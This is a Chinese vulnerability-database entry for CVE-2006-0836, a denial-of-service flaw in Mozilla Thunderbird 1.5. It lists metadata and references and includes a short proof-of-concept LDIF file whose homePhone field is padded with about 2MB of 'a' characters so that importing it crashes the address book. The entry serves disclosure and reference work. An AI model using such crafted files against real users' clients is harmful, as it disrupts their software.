Mozilla Thunderbird地址薄导入远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109769 漏洞类型 其他
发布时间 2006-02-17 更新时间 2006-08-28
CVE编号 CVE-2006-0836 CNNVD-ID CNNVD-200602-331
漏洞平台 Linux CVSS评分 2.6
|漏洞来源
https://www.exploit-db.com/exploits/27246
https://cxsecurity.com/issue/WLB-2006020073
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200602-331
|漏洞详情
MozillaThunderbird1.5可使用户协助式攻击者通过诱骗用户向地址薄中导入具有长字段的LDIF文件来造成未明拒绝服务,如通过长homePhone字段演示的那样。
|漏洞EXP
source: http://www.securityfocus.com/bid/16716/info

Mozilla Thunderbird is prone to a remote denial-of-service vulnerability. 

The issue presents itself when the application handles a specially crafted address book file.

Mozilla Thunderbird 1.5 is reportedly affected by this issue. Other versions may be vulnerable as well.

POC: create a file.ldif and insert following then import it in address book:
n: cn=Test POC by DrFrancky@securax.org,mail=drfrancky@securax.org
objectclass: top
objectclass: person
objectclass: organizationalPerson
objectclass: inetOrgPerson
objectclass: mozillaAbPersonAlpha
givenName: Test
sn: POC by DrFrancky@securax.org
cn: POC by DrFrancky@securax.org
mozillaNickname: DrFrancky
mail: drfrancky@securax.org
nsAIMid: DrFrancky POC
modifytimestamp: 0Z
homePhone: aaaaaaaaaaaaaaa[2MB of 'a']
|参考资料

来源:BID
名称:16716
链接:http://www.securityfocus.com/bid/16716
来源:BUGTRAQ
名称:20060221MozilaThunderbird1.5AddressBookDoS
链接:http://www.securityfocus.com/archive/1/archive/1/425602/100/0/threaded
来源:FULLDISC
名称:20060217MozilaThunderbird1.5AddressBookDoS
链接:http://archives.neohapsis.com/archives/fulldisclosure/2006-02/0399.html
来源:XF
名称:thunderbird-address-book-dos(24810)
链接:http://xforce.iss.net/xforce/xfdb/24810
来源:SREASON
名称:469
链接:http://securityreason.com/securityalert/469